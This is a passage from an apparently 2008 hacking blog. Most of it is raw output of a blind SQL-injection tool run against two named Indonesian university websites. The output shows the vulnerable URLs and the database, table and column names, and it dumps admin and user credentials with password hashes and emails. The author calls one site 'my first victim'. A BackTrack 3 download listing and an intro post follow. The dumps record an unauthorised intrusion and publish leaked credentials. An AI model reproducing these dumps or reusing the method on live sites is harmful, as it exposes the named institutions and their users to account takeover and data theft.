[9]: tbnews
[10]: tbormadetil
[11]: tbormagaleri
[12]: tbormamhs
[13]: tbpenelitian
[14]: tbpolling
[15]: tbpollingdetail
[16]: tbsitemap
[17]: tbstaff

[-] 12:20:36
[-] Total URL Requests 1552
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "dbfti" and Table "tbmember"
[+] 12:20:31
[+] Number of Rows: 9

[0]: user
[1]: pass
[2]: email
[3]: nama
[4]: tgl_lahir
[5]: jk
[6]: alamat
[7]: hp
[8]: type

[-] 12:27:52
[-] Total URL Requests 367
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "dbfti" Table "tbmember"
[+] Column(s) ['user', 'pass', 'email', 'type']
[+] 12:30:51
[+] Number of Rows: 1

[0]: admin:67e6d175480398b4c98842c648bceb4d:admin@fti-tarumanagara.or.id:Admin

[-] 12:36:10
[-] Total URL Requests 535
[-] Done



+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "builderdb" Table "user_account"
[+] Column(s) ['Username', 'Password']
[+] 13:13:10
[+] Number of Rows: 13

[0]: suryana:efd92f19bd78ab7e59775959c014f5aa
[1]: l3lyh:1cc56014cc296ef8cc6ffd2635d7c3dc
[2]: ria_yuni:9a2891b0b857317639a177bcda

[SQLi] http://www.unimedia.ac.id

8:58 PM Posted by viperfx07 No comments
After reading some forums, i try an SQL-injection tool called blindext.py from http://forum.darkc0de.com. Simple tool but it's great. Therefore, i try it in some websites that can be exploited with SQL injection. Unfortunately, md5 is hard to break. Need a lot of time to crack it, so i juz leave it uncracked. Here is my first victim :)

Website: http://www.unimedia.ac.id/
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 10:52:25
[0]: 5.0.51-log:umn@localhost:umn

[-] 10:53:12
[-] Total URL Requests 206
[-] Done




[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 10:12:27
[+] Number of Rows: 2

[0]: test
[1]: umn

[-] 10:12:48
[-] Total URL Requests 80
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "umn"
[+] 10:13:08
[+] Number of Rows: 6

[0]: article
[1]: menu
[2]: myinfo
[3]: mymedia
[4]: myuser
[5]: registrasi_baru

[-] 10:15:04
[-] Total URL Requests 379
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "umn" and Table "myuser"
[+] 10:18:32
[+] Number of Rows: 10

[0]: id
[1]: name
[2]: department
[3]: address
[4]: phone
[5]: email
[6]: mypass
[7]: level
[8]: view
[9]: sdate

[-] 10:20:25
[-] Total URL Requests 467
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "umn" Table "myuser"
[+] Column(s) ['id', 'name', 'email', 'mypass']
[+] 10:22:11
[+] Number of Rows: 2

[0]: 1:Web Admin UMN:webadmin@unimedia.ac.id:dW1uaWN0
[1]: 3:na:admin@min.net:author

[-] 10:24:26
[-] Total URL Requests 542
[-] Done

Wednesday, September 17, 2008

Backtrack 3

2:35 PM Posted by viperfx07 , No comments
Description: CD Image
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: Click here

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: Click here

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: Click here


BackTrack is the most Top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.

BackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts by Tomas M. (www.slax.org) . Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After coming into a stable development procedure during the last releases and consolidating feedbacks and addition, the team was focused to support more and newer hardware as well as provide more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules which help to speed up the maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).

Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date.

No other commercial or freely available analysis platform offers an equivalent level of usability with automatic configuration and focus on penetration testing.

Tuesday, September 16, 2008

Intro: Although it's too late to make :)

11:56 PM Posted by viperfx07 No comments
After so many consideration, I decided to continue to write my blog. Hahaha...so what?

I decided to share everything i have learned, read, and thought, eventhough it's not a lot.

By writing this blog, i want to improve my writing skills in English 'coz i will need it when i go to take my master degree :)

So, please, enjoy yourself here. "Don't judge a book by its cover", Tukul said...